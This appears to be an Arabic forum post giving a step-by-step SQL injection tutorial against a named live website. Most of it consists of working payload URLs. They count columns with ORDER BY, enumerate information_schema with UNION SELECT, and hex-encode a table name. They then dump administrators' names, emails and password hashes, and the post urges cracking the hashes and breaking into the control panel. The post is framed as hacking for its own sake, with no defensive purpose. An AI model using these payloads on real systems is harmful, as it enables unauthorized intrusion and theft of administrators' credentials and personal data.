عنا موقع مصاب
http://www.datavore.com/home?op=cat&cid=2
نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه
نبلش من 1
ونزود لحتى يختفي معانا الخطأ
كود PHP:
order by 1--
order by 5--
order by 10--
order by 15--
لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا
يا نورع العين نرجع لمكانا
order by 15--
لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده
union select
ونضيف قبل الرقم علامه الناقص
يصير الرابط هيك
كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
انتبه للناقص
الان لنعرف اصدار القاعده
نكتب
وهذه بعض الاوامر
database()
version()
user()
not end
الموضعوع لم ينتهي بعد
الان نضيف التالي للحقنه
كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema)
و
كود PHP:
+from+information_schema.columns--
فتصبح
كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns--
الان نضيف الامر التالي
كود PHP:
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف
طيب الخبره رح تعلمك شو تختار
الان عنا مفترق مثلث ماشاء الله
شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده
SurveyAdmins:admin_password:SURVEYS SurveyAdmins:admin_md5_password:SURVEYS زي ما انتو شايفين عنا خيارين بتهيالي الاول هو الي مطلوب
خلينا نشتغل عليه
بلزمنا الان الموقع الرائع وهو
كود PHP:
http://www.waraxe.us/sql-char-encoder.html
اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو
SurveyAdmins
نوع التشفير هو
كود PHP:
MySql hex-encoded string
يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر
where+table_name=
يعني هيك
كود PHP:
where+table_name=0x53757276657941646d696e73
الاستغلال
كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73--
ما شاء الله طلع لنا خيارات كثيره
بهمني انا منها
الان خلينا نجمع الاستغلال
اسم الجدول
SurveyAdmins
السجما
SURVEYS
اسم العمود هو باقي الاسماء بالوسط ورح نجمعها كلها مع بعض بالامر concat وبتصير هيك concat(name,0x3a,pass) كود PHP:
;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm;
نجمعهم بالامر
بصيرو
كود PHP:
concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm)
نركبه بالحقنه
كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins--
بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق
 | اقتباس |  | | | | | | | | | |
والله يا حبايبي اجيت اعمل لكم الدرس صوت وصوره بعد من خلصت من هالكتابه الطويله
لقيت الموقع ضرب ومش راضي يفتح
رح اشرح نفس الخطوات على موقع ثاني
بعين الله | |  | |  | |
استفين ع التاخر هي الدرس بالفيديو .....
من اكتشاف الثغره SQL الى لوحه التحكم بالصوت والصوره
jvjdf hgo',hj td prk r,hu] hgfdhkhj SQL Injection hgavp injection avp a;v a;vh sql